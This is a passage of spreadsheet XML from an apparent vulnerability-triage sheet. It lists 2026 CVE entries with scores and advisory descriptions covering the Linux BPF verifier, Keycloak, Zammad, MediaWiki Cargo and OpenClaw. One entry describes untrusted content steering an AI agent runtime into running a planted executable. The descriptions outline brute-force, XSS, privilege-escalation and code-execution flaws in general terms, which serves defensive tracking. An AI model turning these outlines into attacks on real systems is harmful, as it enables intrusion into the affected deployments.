      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97953</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98041</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr"/>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Don't predict JMP32 pointer vs zero comparisons
Consider the following program:
        r1 = map_value;      /* low 32 bits are zero at runtime */
        r6 = 0xdead000000000000;
        if w1 != 0 goto l1;
    l0: r1 += r6;
        r2 = *(u64 *)(r1 + 0);
        exit;
    l1: r6 = 0;
        goto l0;
At the moment is_branch_taken() reports the jump as always taken,
because it does not distinguish between BPF_JMP and BPF_JMP32
comparisons when processing 'if w1 != 0 ...'.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98041</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98150</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr"/>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix BPF_F_CPU validation for sparse CPU IDs
BPF_F_CPU stores the target CPU ID in the upper 32 bits of the map
operation flags. bpf_map_check_op_flags() currently compares that ID
with num_possible_cpus(), which is the number of possible CPUs rather
than a bound on CPU IDs.
On an arm64 QEMU guest with a CPU device-tree hole, the possible CPU
mask was 0,2-3. A userspace program using raw bpf() syscalls creates
a BPF_MAP_TYPE_PERCPU_ARRAY and performs update and lookup operations
for each CPU by setting BPF_F_CPU and the CPU ID in the flags.
With the old check, CPU 1 is incorrectly accepted while valid CPU 3 is
rejected with -ERANGE. The CPU 1 update then reaches the per-CPU map
access path and triggers:
  Unable to handle kernel paging request at virtual address ...
  pc : __pi_memcpy_generic+0x5c/0x22c
  lr : bpf_percpu_array_update+0x2dc/0x2e8
  Call trace:
    __pi_memcpy_generic
    bpf_map_update_value
    map_update_elem
    __sys_bpf
Check the CPU ID against nr_cpu_ids and cpu_possible() instead. This
rejects CPU IDs outside the valid range and CPUs absent from the
possible mask, while allowing valid sparse CPU IDs.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98150</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17545</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-67</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>On Windows, PHP's filesystem and stream APIs do not reject reserved device names such as CON, PRN, AUX, NUL, COM1 to COM9, LPT1 to LPT9, CONIN$ and CONOUT$ when they appear as a component of a path. An attacker-controlled filename therefore reaches CreateFileW() and opens a device instead of the regular file the application expected, which can block or hang the request and exhaust worker processes.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67226</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7, Admin-only atom exhaustion: PUT /api/users tags list. settags/2 maps rabbitdatacoercion:toatom/1 over the user's tags list. The 20 MB management body limit fits ~3-4M short tag strings. An administrator can crash the node in a single request by creating a user (or importing definitions) with ~1M unique tag administrator. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67226</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84461</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-203, CWE-307, CWE-799</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the two-factor login step let an attacker try unlimited password guesses for any account without triggering Zammad's normal lockout or rate limiting. The response also revealed whether a guess was correct, even before two-factor authentication was checked. This made it possible to brute-force weak or reused passwords. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84461</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96875</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96875</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96876</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96876</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96877</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96877</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96878</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Mediawiki - Cargo extension allows Reflected XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96878</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97846</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>keycloak, gin</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a feature called mTLS holder-of-key binding which ensures that a token can only be used by the client that originally requested it by binding it to their digital certificate. A flaw was discovered where the new Standard Token Exchange V2 feature does not check for this certificate. This allows an attacker with stolen client credentials to obtain a standard, unrestricted token that bypasses these security protections.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97846</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100584</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent runtime. In versions &gt;= 2026.2.26 and &lt; 2026.7.1, PowerShell command analysis on Windows hosts running in exec allowlist mode could approve an exact executable resolved from PATH but subsequently execute a same-named executable located in the workspace directory. If lower-trust content can place an executable with an approved basename into an agent-writable workspace and steer an approved PowerShell command that uses a bare executable name, OpenClaw may run the workspace file instead of the allowlisted path, executing arbitrary code with the privileges of the Gateway or node-host user. The issue does not require replacement of the approved executable itself. Version 2026.7.1 contains a fix; as a workaround, avoid bare executable names in approved PowerShell commands and keep executable files out of agent-writable workspaces.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100584</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96448</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Fine-Grained Admin Permissions (FGAP v2) feature of Keycloak, an identity and access management solution. The issue occurs when the system checks if a delegated administrator has permission to assign a specific role to a user. Because the check does not look inside composite roles to see what other permissions they contain, an administrator with limited rights can assign a role that secretly includes full administrative control. This allows the attacker to gain complete management access over the entire realm.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96448</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100192</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 exposes appKey and appSecret credentials in the GET /application/manager/select endpoint without authentication or field filtering. Unauthenticated attackers can retrieve these credentials and use them to send arbitrary SMS messages through any tenant's SMS provider, enabling SMS bombing and impersonation attacks.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100192</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100501</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an improper restriction of excessive authentication attempts vulnerability in the POST /api/auth login endpoint that allows unauthenticated attackers to brute-force the admin password. Attackers can submit unlimited password guesses without rate limiting, attempt counters, lockouts, or delays to gain full administrator access and modify application configuration.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100501</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100531</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The @openclaw/slack npm package before 2026.8.1 contains an authorization flaw in its Slack download-file handler: when a file lacks the share metadata used to prove it belongs to the requested conversation, the conversation-authorization check fails open. An authenticated caller restricted to a single conversation who knows or obtains a file identifier can therefore download file contents from outside that conversation's scope, disclosing data across configured conversation boundaries. The issue does not allow listing arbitrary Slack files and does not bypass Slack authentication itself. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
